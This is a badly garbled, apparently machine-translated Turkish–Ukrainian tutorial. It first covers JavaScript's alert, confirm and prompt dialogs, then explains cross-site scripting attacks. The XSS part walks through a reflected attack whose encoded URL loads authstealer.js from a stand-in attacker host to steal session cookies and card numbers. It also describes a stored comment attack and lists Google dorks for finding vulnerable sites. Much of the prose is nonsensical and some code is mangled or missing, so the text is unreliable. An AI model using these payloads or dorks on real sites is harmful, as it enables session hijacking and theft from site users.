Bu aynı zamanda javascript'te bir bilgi istemidir. JavaScript - Yöntemler uyarısı, sor ve onayla. Geçersiz XSS ile saldırı kıçına
Bu statty mi vivchimo'da üç tsіkavih yöntemi ve kendisi yöntemler uyarısı (), onayla () ve istem ()... hepsini kokla koristuvach ile etkileşim için tanımlamalar.
Her üç yöntem de pencerede bulunur (tarayıcı penceresi). Kokusunu şöyle alabiliyorum: window.method_name(); Ale, JavaScript, pencereye itiraz etmemize ve basitçe yöntemi adlandırarak yazmamıza ve yazmamıza izin verir.
alert() yöntemini kullanalım. Danimarka yöntemi, tarayıcının sonunda belirtildiği gibi gösterilecektir. Sonunda her tarafta görünecek ve OK düğmesine basmadığınız sürece kapatmıyorsunuz.
Gösteri için, vivedemo ek uyarı () yöntemine bağlanacaktır.
Var bugün_is = "Pazartesi"; uyarı ("Bugün" + bugün_is);
Orta yöntemlerde bir satır kullanabiliriz, sadece html etiketi iv. Buradaki koku obroblyayutsya değil, vivodatsya yak є.
Bir satır ise, yapmak istiyorsanız, yeni bir satıra geçmek istiyorsanız, işte html etiketi
değil. Burada "\ n" karakterini seçmeniz gerekiyor.
Uyarı ("Looooooooong \ nStringgggggggg");
Danimarka yöntemi genellikle galip gelir bir şaka için kodda bir af.
Kodu işleme süreci yukarıdan aşağıya doğru gider, bu nedenle affı yakalamak için, affın bulunduğu bekleme alanına alert() yöntemini yazmanız yeterlidir. Uyarıyı () spratsyuvav'ı severim, üst üste demek, yazım yok, af yok.
Dal, bir satır veya daha aşağıya aktarmak gerekiyor. Zberigaєmo göz kırpıyor, tarayıcıdaki yeni sayfayı biliyorum ve merak ediyorum, eğer uyarı () spratsyuvav, yani, satır için özür dilerim, іnshomu vipad'de, hayır, olma belirtisi yok, spratsyuvav değilse, pompa üst üste vishche tієї, de vin hemen perebuvaє... Böyle bir sıralama ekseni, kodda bir af olarak kabul edilebilir.
() yöntemini onayla
Tüm yöntem, bilgilerin doğrulanması için, beslenme için muzafferdir. Є (Tamam) chi ni (İptal / Skasuvati) olmak üzere yalnızca iki seçenek görünür. Cevap doğruysa, yöntem doğruya (doğru) döndürülür ve yöntem kutuyu (yanlış) döndürmektir.
Popo için, ek onay () yönteminin sonunda vivedemo, enerjisiz koristuvach "Gerçekten tarafı aşmak istiyor musunuz?". Eğer öyle diyorsanız, o zaman alert() yöntemi ile "Koristuvach kenardan ayrılmak istiyor" mesajını, diğerinde ise "Koristuvach kenardan ayrılmak istemiyor" mesajını göreceksiniz.
Var user_answer = onaylayın ("Gerçekten sayfanın üzerine yazmak istiyor musunuz?"); if (user_answer) alert ("Koristuvach sayfadan çıkmak istiyor"); else uyarısı ("Koristuvach \ n'nin yanından ayrılmasını İSTEMİYOR");
Yani rankın ekseni onay () yöntemidir. Win farklı vypadki içinde vikoristovuvatisya olabilir. Örneğin siteden görülmeden önce kendi kızından suçlu bulunan bir koristuvach'ı beslemeye çekilmiş. Ancak formu değiştirmeden önce, corystuvach'ı "Her şeyi doğru hatırladın mı?"
İstemi () yöntemi
İsteğe bağlı olan ilk durdurma yöntemi, bilgi istemi () yöntemidir. Danimarka yöntemi galip geldi, ancak aşağıda iki yöntem var. Wien, metin alanına girerken koristuvach hakkındaki bilgileri düzeltmenizi sağlar.
Sonuç olarak, komut istemi () yöntemi döndürülecek, ya OK düğmesine basarsam bir satır gireceğim, ya da OK düğmesine basarsam null.
Bu bir parametredir, böylece belirli bir yöntemin tüm orta yayları bir satırda yazılabilir veya bir kaynak, bilgiyi biliyorsanız, onu girmeniz gerekir.
Örneğin, koristuvach'tan "Yak seni arar mı?" sorusuna cevap vermesini istiyoruz. İsim yardımı ile tanıtılan, ek uyarı () yönteminin arkasında ekranda görüntülenir.
Var name = komut ("Seni nasıl arayabilirim?"); uyarı ("Seni ara" + isim);
Zberigaєmo ve bağlantının tarayıcıda görüntülenmesi.
Görünüşe göre, metin alanına komut istemi () yöntemiyle herhangi bir bilgi girebilirsiniz. Bilgiler, sayıların veya bazı özel karakterlerin zamanlarında gezinmek için bir satır gibi döndürülecektir.
Popo için koristuvach'tan iki sayı girmesini istiyoruz, sonra onları çarpabiliriz. Birden fazla sayı için bir hesap makinesi olacak.
Var x = komut istemi ("İlk sayıyı girin:"); var y = komut ("Başka bir sayı girin:"); // Girdi numaralarını bir dize türünden sayısal bir türe yeniden yazma x = Sayı (x); y = Sayı (y); belge.write (x + "*" + y + "=" + (x * y));
Sayıları satırlar halinde girme, böylece doğru sonucun çarpılması için sayıyı Sayı () işlevinden geçirmeniz gerekir, çünkü sayıyı dize türünden normal sayılara dönüştürür.
Hepsi bu. Artık üç yöntem biliyoruz: uyarı (), onayla () і istemi ()... Pratikte smilo vikoristovuvati yapabilirsiniz.
JavaScript'te üç tane var temel işlemler, Yaki, komut dosyalarındaki işlemlerin geri kalanı için koristuvach'tan verileri kırpmanıza izin verir. Uyarı, onaylayın. Kokunun neden durgun olduğu, vikoristovuvati ve nshy nüansları olduğu ve statty'de çok fark edileceği için.
Alarm
Tarayıcı ekranında kalıcı bir pencere görüntülemek için sıkıştı (bu, ağlamadığı sürece hiçbir şeyin yandan çizilemeyeceği anlamına gelir. Açılan popoda, sessizce Tamam düğmesini bırakın) pencerede.
Mesaj görüntülendiğinde, mesaj uyarıda görüntülenir, modal pencere kapatıldığında komut dosyası görüntülenir ve güncellenir.
zaman zaman zapovnennya alanlar saldırıya uğradı TAMAM, komut dosyasında bilgi, yaku vіv koristuvach.
Komut sözdizimi Bazen katlanabilir, önden daha alçaktır ve bazı fragmanlar, koristuvach'tan önce hayvanın metnini ve bilgi girmek için alanın içeriğini girmenize izin verir, eğer öneriler istenirse: sonuç = Sor (başlık, varsayılan);, de
- Başlık- aslına bakarsanız, koristuvachev modal penceresinde tanıtılacakmış gibi. Argüman zapovnenya için bağlayıcıdır.
- varsayılan- daha sonra, değişiklik için metnin tanıtımı için alanda scho vivedetsya. Ayrıca depolama için bağlayıcıdır, koyamazsanız, o zaman deyaky tarayıcılarda affınıza getirebilirsiniz. Bilgi girmek için alanı boş bırakmak istiyorsanız, bir sonraki sıra ile bilgi istemeniz yeterlidir:
var myTest = komut istemi ("Yake bilgisi", "" ");
küçük popo vikoristannya istemi:
var yıl = komut ( "VNZ'yi nasıl bitirdin?", 2008); uyarı ("Wee vipusknik" + yıl + "rock!");
Zazvychay, vikoristovutsya'ya koristuvachiv'den haraç toplama emri verdi, çünkü senaryo diğer robotların ilerlemesi için gerekli.
onaylamak
Ayrıca є modal vіkno... Yak, uzgozhennya chogos z koristuvach için vikoristovutsya zzvychay adını istemek kolay değil.
Bu amaçla, keskinleştirilir - OK ve İPTAL düğmelerinin değişimi için, komut dosyası boole değerlerini sırasıyla doğru ve yanlış hale getirmek için.
Günün sonunda yöntemlerle öğrenebilirsiniz. ob'єkta penceresi: Uyarı (), istem () onaylanır ().
Uyarı () yöntemi
Uyarı () yöntemini ekranda temkinli bir diyalog penceresi görüntülemek için değerler, çünkü "Tamam" düğmesine atayacağız. Koristuvach'a önemli bilgileri iletmek için vikoristovuvatisya yapabilirsiniz.
window.alert (Parametre_1);
alert() yönteminin bir bağlama parametresi vardır - iletişim penceresinde görüntülenen mesaj metni. Danimarka yöntemi, vikonannya'nın bir sonucu olarak tersine çevrilmemiştir.
Örneğin, poperezhuvala diyalog vіkno'ya saldırı olan bir site için bir vivedemo: siteye git
() yöntemini onayla
İletişim kutusunun ekranında iletişim kutusunu görüntülemek için değerlerin penceresini ayarlamanın onay () yöntemi, çünkü onu "Tamam" ve "Skasuvati" düğmeleriyle ekrana atayacağız. Teyit talebinde bulunabiliyorsanız, koristuvach'tan bu günün teyidi için bir arama yapmasını isteyebilirsiniz.var resultConfirm = onayla (Parametre_1);
Danimarka yönteminin bir parametresi vardır - iletişim kutusunda gösterileceği gibi mesajın tüm metni.
Kendi onayının sonucunun (resultConfirm) kalitesinde onay () yöntemi iki değerden birine döndürülür:
- true, "Tamam"a basarsanız;
- yanlış, sanki koristuvach "Skasuvannya" ya bastı ya da yogoyu lanetledi.
Örneğin, p s id = "result" öğesindeki vivedemo, diyalog penceresindeki "Tamam" düğmesine tıklayarak saldırının sonucunu onaylayın:
İstemi () yöntemi
Veri girmek ve "Tamam" ve "Skasuvati" düğmelerini kullanmak için bir metin alanı içeren iletişim kutusunun ekranında iletişim kutusuna girmek için bilgi istemi () değerleri yöntemi. Wono bir koristuvach ile beslenmek içindir.
var sonuçPrompt = bilgi istemi (Parametre_1, Parametre_2);
Danimarka yönteminin iki parametresi vardır:
- zaman zaman, diyalog penceresinde görüleceği gibi. Danimarka parametresi є, metin alanına coristuvach'ı girmek sorumluluk olduğu için "bulunacak" olduğu bağlanacak ve intikam alınacaktır;
- diğer parametre isteğe bağlıdır ve görüntülendiğinde iletişim kutusu girilen alanına girileceği için cob değerini girmek için kullanılabilir.
İstem () yöntemine bakarsanız, bir sonraki tarihi çevirebilirsiniz:
- metin anlamı - eğer alana veri ve koristuvach natisnuv "Tamam" intikam almak için girilir;
- boş satır - giriş alanında olduğu gibi, verilerden intikam almaya ve "Tamam" a basmaya gerek yoktur;
- null - koristuvach natisuvach "Skasuvannya" veya zakrytse vіkno, danі bouli'nin metin alanına girmesinin önemli olmadığı.
Not: iletişim kutusu, uyarı (), onay () yöntemlerinden veya komut istemi () є modalinden birinin sonucunda göründüğü gibi, corystuvach'ın dadatkom'a (tarayıcıya) erişimini sessizce engelleyene kadar, sor corystuvach vіkno değil.
Örneğin, id = "nameUser" olan öğedeki metin:
Örneğin, 8 sayısını tahmin etmek için bir koristuvach istiyoruz:
... sayıyı tahmin et
Seni Chergoviy'de astığımı biliyorum. JavaScript, Yakiy mi rozberemo'da yöntemler uyarısı, istemi, doğrulaması... Dani yöntemleri є vbudovam in mov Javascript ve koristuvach ile işbirliği yapmamıza yardımcı olun.
Uyarı Tarayıcı ekranına, komut dosyasına OK düğmesine basıldığı ana kadar basıldığı için şarkı bilgilerini içeren bir pencere getirmek için.
Çabuk Kural olarak, hangi durumda yemeğin sorulduğunu, şarkı söyleyen metin alanına cevap vermekten hangi hatanın suçlu olduğunu, OK düğmesine bastığınızda belirtmek önemlidir. Aynı şekilde, skasuvannya'nın tuşuna basarak bir koristuvach'ı tanıtmanız gerekmeyebilir.
Onaylamak Ayrıca, koristuvach'ın metin alanına hiçbir şey giremeyeceğiniz vіkno'yu girin, ancak OK düğmesine veya skasuvannya'ya basmaktan mahrum bırakabilirsiniz.
Ve şimdi, küçük bir girişten sonra, pratikte söylenen her şeye bakmaya gideceğim.
Sonuç olarak, tarayıcı tarafı güncellendiğinde, koristuvach'ın selamlarıyla bir pencerede görüneceğiz. OK düğmesine basıldığında, görüntünüzü beslemek için hemen görünecektir. V Bu methodє є bağlayıcı olan ve gıda seçimimize dahil edilecek olan başlık için görüntülenecek olan iki parametre koristuvach. Metin alanındaki öneriler için görüntüleneceği için değer için ilk diğer parametre görüntülenir. Adınızı girip OK düğmesine basarsanız, adınız pencereye gidecektir. isimKullanıcı... Düğmeye basarsanız, gelecekte yazacaksınız boş.
Her şeyden önce, koristuvach'ta yemek yediğiniz anda sitemizden ayrılmak istiyorsanız chi ni. Değişiklik vesilesiyle mantıksal anlam sağlanacaktır. NS, І vіdmovі'da YANLIŞ kesinlikle. Eksen ve her şey, derslerin başlangıcına kadar bu yöntemlerle ilgili soylulara gidin!
Siteler arası komut dosyası oluşturma (XSS), web tarafında istemci tarafında (JavaScript) görmek, içeridekilere bakmak gibi, gömülü koddaki bir polyag gibi bir farktır.
Kazananları, web sitesine eklemek için web sayfasına gönderilen filtreleme haraçlarının olmaması nedeniyle dağıtmak. Belirli bir popoya yakınlaştırmak daha kolaydır. Bunu bir misafir defteri olarak düşünün - belirli bir koristuvach görünümünü ve sahte bir görüntüyü kabul etmek için kullanılan bir dizi program. Açıkçası, misafir kitabı görselleştirilmedi ve filtrelenmedi, ancak tanıtıldı, sadece görselleştirildi.
kendi atabilirsin en basit komut dosyası(Basit bir şey yok, PHP'de kötü komut dosyaları yazmaya gerek yok - meşgul olamayacak kadar büyük). Zaten daha fazla hazır seçenek yok. Örneğin, Dojo ve OWASP Mutillidae II hakkında bazı bilgileri kaçıracağım. Benzer bir popo var. Dojo'nun özerk ortasında, izin almak için tarayıcıya gidin: http://localhost/mutillidae/index.php? Sayfa = blogunuza-ekleyin.php
koristuvachiv viv'den Yakshko htos:
Bu web tarafı ekranı:
Vitanya! Sitenize benzer.
Ve koristuvach'a şu şekilde gireceksiniz:
Vitanya! Sitenize benzer.
Şu şekilde görünürler:
Tarayıcılar harika web sitelerinden ücretsiz çerezler kaydeder. Dış görünüm sitesi yalnızca kendiniz kaydederek düzenlenebilir. Örneğin, example.com sitesi tarayıcınıza yüklenir. Başka bir.com sitesine giderseniz, sitenin tamamı (istemci ve sunucu komut dosyaları), example.com sitesi gibi çerezlere erişimi işlemek için kullanılamaz.
example.com sitesi XSS'ye şişirildiğinden, yeni JavaScript kodunu en etkili şekilde ekleyebileceğimiz anlamına gelir ve kod example.com sitesinde görüntülenecektir! Bunu yapmak için kod, örneğin example.com çerez sitesine erişim sağlanacaktır.
Sanırım herkes JavaScript'in corystuvachiv tarayıcılarında mevcut olduğunu hatırlayacaktır, böylece XSS'nin varlığında, bir shkidlivy kodunun eklenmesiyle, web sitesini açmak için kullanılabilecek verilen corystuvach'a erişimi reddedeceğim.
Ek olarak, kod JavaScript'teki tüm kodlarda bulunur, ancak kendisinde:
- Siteyi görmek için çerezlere erişimi devre dışı bırakacağım
- biraz yılan getirebilirsin zovnishniy viglyad yan yan
- Değişim arabelleğine erişimi kaldıracağım
- JavaScript programlarını, örneğin keylogger'ları kullanabilirsiniz.
- BeEF'i dinle
- ki.
Bebekler için kullanımı kolay buttstock:
İyi bir sebep için, Alarm vikorystovuєtsya yalnızca XSS algılaması için. Büyük bir anlaşma yapmak gerçekten büyük bir anlaşma. Vaughn'un araması memnuniyetle karşılandı sunucuyu görüntüle kötü niyetli ve yeni çalınan haraç iletildi.
XSS'ye bakın
Naygolovnishe, XSS'i görmek hakkında söylenmesi gereken şey, ne kokuyor:
- Kaydet (Gönder)
- Vidbit (Yayın değil)
Postacıların kıçı:
- Kötü kişi tarafından tanıtılan özel oluşumlar tarafından ziyaretçi defteri (yorum, foruma yazılan, profil) server olarak, skinin serverinden bir kez giriş yapılırsa, parti imajını güçlendirmek için kullanılır.
- Kötü niyetli kişi, örneğin, sunucu haraçına erişerek SQL 'єкцію, vidayutsya'da І vvadv kötü JavaScript kodunu (ki-logery veya s BeEF) korur.
Kalıcı olmayanın poposu:
- Sitede bir şaka var, sanki sonuçlarla aynı anda şaka “Şaka yapıyordunuz: [şaka sırası]”, tüm övgüler uygun sıraya göre filtrelenmemekle birlikte. Oskіlki böyle bir taraf sadece ona yanıt verene gösterilir, o zaman kötü niyetli kişi sitenin mesajını yanlış olanlara göndermezse, saldırı yanlış gitmez. Kurbanın izninin yeniden yönlendirmesini değiştirmek için, kötü niyetli komut dosyasını kurban olan tarafsız bir siteye göndermeyi seçebilirsiniz.
Ayrıca görüyorum (algısal olmayan XSS dürtüleri, dekh, bir tür olabilir veya bir tür XSS sonrası olarak hareket ediyor):
- DOM modelleri
DOM tabanlı XSS özellikleri
Söylemesi basit olduğu gibi, "abartılı" yerel olmayan XSS programının HTML kodu görüntülendiğinde programlanabileceğini söylemek çok basit. Örneğin, posilannya aşağıdaki sıralamadan oluşur:
Http://example.com/search.php?q= "/>
Ve çıktı HTML kodu görüntülendiğinde şöyle görünür:
Ve DOM XSS, tarayıcıda şekillendirilebildiği ve vurgulanan kodla değiştirilebildiği için DOM yapısını değiştirir; HTML hiç değişmez. Popo için aşağıdaki kodu ekleyelim:
Ardından tarayıcılarda mümkündür:
Dönüş kodu:
Adresi bir sonraki sıraya göre formüle edelim:
Http: //localhost/tests/XSS/dom_xss.html#input=tokenAlex;
Şimdi nöbetin tarafı şöyle:
ale hadi bakalım çıktı kodu HTML:
Kesinlikle değiştirilecek bir şey yok. Dediğim gibi, basit programı görebilmemiz için belgenin DOM yapısına hayran kalmamız gerekiyor:
Burada XSS'nin çalışan bir prototipi gösteriliyor, gerçek bir saldırı için daha fazla daraltılabilir seçeneğe ihtiyacımız var, çünkü koma lekeleriyle hemen okumayanlar için buna değmez. uyarı (1); uyarı (2) bu iyi bir şey değil. Protesto, zavdyaki kaçış () Buna karşılık, haraç aşağıdakilere çevirebiliriz:
Http: //localhost/tests/XSS/dom_xss.html#input=tokenAlex;
De mi sembolü değiştirdi ; URI kodlamalarında eşdeğer!
Artık standart işlevsel olmayan web sitesi komut dosyası oluşturma için yapılması gerektiği gibi, JavaScript'i özelleştirmeden ve kurbanı yeniden yönlendirme seçeneğini kullanmadan çok sayıda komut dosyası yazabiliriz.
XSS Denetçisi
V Google Chrome(Ayrıca, şimdi Google Chrome'un vikoristovuyu motoru olan Opera'da), kontrol eksenimde böyle bir sürpriz:
dom_xss.html: 30 XSS Denetçisi, "http: //localhost/tests/XSS/dom_xss.html#input=token içinde bir komut dosyası çalıştırmayı reddetti; "Çünkü kaynak kodu istek içinde bulundu. Sunucu ne bir "X-XSS-Protection" ne de "Content-Security-Policy" başlığı göndermediğinden denetçi etkinleştirildi.
Tobto artık XSS'i alabilecek tarayıcı є XSS denetçisinde. Firefox'ta bu işlevsellik pek yok ama bence tam zamanı. Tarayıcılardaki uygulama uzak olacaksa, XSS depolamayı bükmenin değeri hakkında konuşabilirsiniz.
Korisno pam'yatati, okul modern tarayıcılar DOM XSS'ye monte edilmiş orijinal olmayan XSS'de oturum açma ve sorunlardan yararlanma yolundan çıkma. Ek olarak, web sitelerini ek bir tarayıcı için test ederken hatırlamak gerekir - mümkün olduğunca, web beslemelerinin şişirildiğini görebilirsiniz, ancak yalnızca nedenin engellenmesi nedeniyle kafa karıştırıcı bir tarayıcı onayı ile uğraşmayın.
İstismarı uygula XSS
Web sitesi komut dosyalarının çok yönlülüğü konusunda muzaffer olabilecek kötü adamlar, cilt çok yönlülük sınıfına farklı bir şekilde gelmekten suçludur. İşte dış görünüm sınıfı için saldırı vektörleri.
Saldırılara XSS enjekte edildiğinde, saldırıyı web sitesinden yerel olarak otochennye koristuvachiv'e genişleten BeEF kullanabilirsiniz.
Geçersiz XSS ile saldırı kıçına
1. Alisa genellikle ev sahibi Bob'un sitesidir. Bob'un web sitesi, Alice'in tuş vuruşu / şifre adıyla oturum açmasına ve ödeme bilgileri gibi hassas verileri kaydetmesine olanak tanır. İstemci iyiyse, tarayıcı yetkilendirme çerezlerini kaydeder, çünkü bunlar hatasız semboller gibi görünür, böylece bilgisayarı rahatsız eden (istemci ve sunucu) hatırlanır, gitmiş olursunuz.
2. Melory, Bob'un web sitesinin intikam almadığı anlamına gelir post_ynu XSS değişkenlik:
2.1 Bir fıkranın tarafı görüntülendiğinde, fıkra için bir satır girilir ve düzenle butonuna tıklanır, sonuçlar bilinmiyorsa bir fıkra girilir, ardından "bilinmiyor" ibaresi ve url yazılabilir. görüntülenen http://bobssite.org?q= ona ses güç kaynağı
2.2 “Kelime için normal bir ses beslemesi ile köpekler"Sayfa basitçe görüntülenir" köpekler, bilinmiyor "ve url http://bobssite.org?q= köpekler, Scho є tamamen normal davranış.
2.3 Bir gürültüde konsola anormal bir ses güç kaynağı gönderilirse koruyun :
2.3.1 Bir değişiklik gördüğünüzde görünün ("xss" demek gibi).
2.3.2 Görüntü kenar çubuğu bilinmeyen"xss" yazısı ile af hakkında emir verilir.
2.3.3 sömürü için ekli url http://bobssite.org?q=
3. URL'nin kullanımı için özelleştirilmiş URL tasarımı:
3.1 URL'yi kazandı http://bobssite.org?q=yavru köpekler ... Vaughn Cabrio'yu titretebilir ASCII karakterler on altı formatta, böyle bir yak http://bobssite.org?q=puppies%3Cscript%2520src%3D%22http%3A%2F%2Fmallorysevilsite.com%2Fauthstealer.js%22%3E insanların shkidlivy URL'sini gizlice deşifre edememeleri için.
3.2 Bob'un sitesinin bir üyesine hiçbir şekilde e-posta göndermeyecek ve sanki "Havalı köpekleri yakalayın" gibi.
4. Alisa yaprağı kaldıracak. Vaughn köpekleri ve klatsaları tek başına sever. Şakayla Bob'un sitesine gidiyorsunuz, hiçbir şey bilmiyorsunuz, orada “köpekler, bilmiyorsunuz” görünüyor ve ortada bir komut dosyasıyla (ekranda görünmez) etiket başlatılıyor ve programı engelliyor Melory authstealer.js ... Alisa zabuvaє pro tse.
5. authstealer.js programı Alisi tarayıcısında bu şekilde, Bob'un web sitesinde olduğu gibi çalışacaktır. Alice'in yetkilendirme çerezlerinin bir kopyasını isteyeceğim ve Melory'nin sunucusu de Melory їх vityagu'ya ileteceğim.
7. Şimdi, Melory vseredin ise, sitenin ödeme dağıtımında olmayacak, merak et ve numaranın bir kopyasını çal kredi kartları Alisi. Şifreyi değiştirelim, böylece artık Alisa daha fazla giremez.
8. Vona virіshuє zrobiti gelecek timsah ve belirli bir rütbe ile Bob'un kendisine göre tasarlanacak ve böyle bir rütbe ile Bob'un idari sitesinden faydalanacağım.
Kalıcı XSS saldırısı
- Melory'nin Bob'un sitesinde bir hesabı var.
- Melory teşekkür ederim, Bob'un web sitesi XSS aciliyeti görevinden intikam almaktır. Yeni bölüme giderseniz yorumu değiştirin, yeni bölümde göremezsiniz. Yorum metninin HTML etiketleriyle değiştirilmesi gerekiyorsa, komut dosyası etiketleri başlatılırsa etiketler görüntülenecektir.
- Melory, Haberler bölümündeki makaleyi okudu ve Yorumlar bölümüne yorumu yazın. Açıklamaya şu metni ekleyin:
- Benim tarihimde köpekler çok onurlandırıldı. Çok şanlı kokuyorsun!
- Alisa (herneyse, gerçekten değil) yorum içeren bir gönderi eklerse, Melory komut dosyası etiketi Alisa'nın yetkilendirme çerezlerini başlatır ve çalarsa, toplama için Melory'nin gizli sunucusuna gönderin.
- Melory artık Alisa'nın oturumunu devralabilir ve Alisa için kendini görebilir.
Razlivikh'deki siteleri XSS'e kadar itin
XSS yolları
İlk çiğdem, XSS saldırılarını kullanabileceğimiz siteleri titretmektir. Site, Dorken Google'ın yardımıyla shukati olabilir. Zincirin ekseni, Google'a kopyaladığınız gibi, bu tür Dorkens'ten gelir:
- inurl: search.php? q =
- inurl: .php? q =
- inurl: search.php
- inurl: .php? arama =
Bizden önce sitelerin bir listesi. Siteyi açmak ve form gibi giriş alanlarını bilmek gereklidir. zil çalıyor, Giriş formu, sitede yayınlama vb.
Popüler otomatik yeni web eklentilerinde akıllı ve kullanımı kolay olmanın çok pratik olduğuna hemen saygı duyacağım. Böyle bir eklentinin klasik poposu WordPress'tir. WordPress'te ve özellikle eklentilerde aciliyet adına, є. Dahası, tembel siteler yoktur, ancak herhangi bir WordPress motorunu (web yöneticisinin kendi değişiklikleri olarak koçanı koduna getirdikleri aracılığıyla) veya eklentileri ve bunları (kural olarak, aynı eklentiler kullanılır) entegre etmezler. . Ale, hepsini okuyup yeni şeyler biliyorsanız, WordPress size göre değil demektir...
Nykrashchі meti - uygun maliyetli kendi kendine yazma motorları ve komut dosyaları.
Yak korisnogo navantazhennya yerleştirme için titreştirilebilir
Saygınızı, kodunuzu HTML kodunda kullandığınız aynı HTML etiketlerinde tamamlayın. Standart giriş alanının popo ekseni ( giriş):
Bizimki, tudi'yi şımartmak için navantazhennya'dır, bir kerede "yastık kılıfı" kelimesini de. Tobto etiket değerini yeniden programlamak giriş... Mi mogo tsiogo uniknuti - zakєmo kaymak bacaklar, Ve sonra etiketin kendisi yardım içindir "/>
"/>
Web sitesi için deneyelim:
Vіdmіnno, varyans є
Şaka ve XSS aciliyeti taraması için programlar
Melodik bir şekilde, tüm web tabanlı tarayıcılar bir XSS hüner tarayıcı ile taranabilir. Qia konu kapsayıcı değil, bir cilt pod_bnim okremo tarayıcı ile bilmek daha güzel.
Є XSS Ease üzerinde tarama için özel araçlar da vardır. Bunların arasında özellikle görebilirsiniz.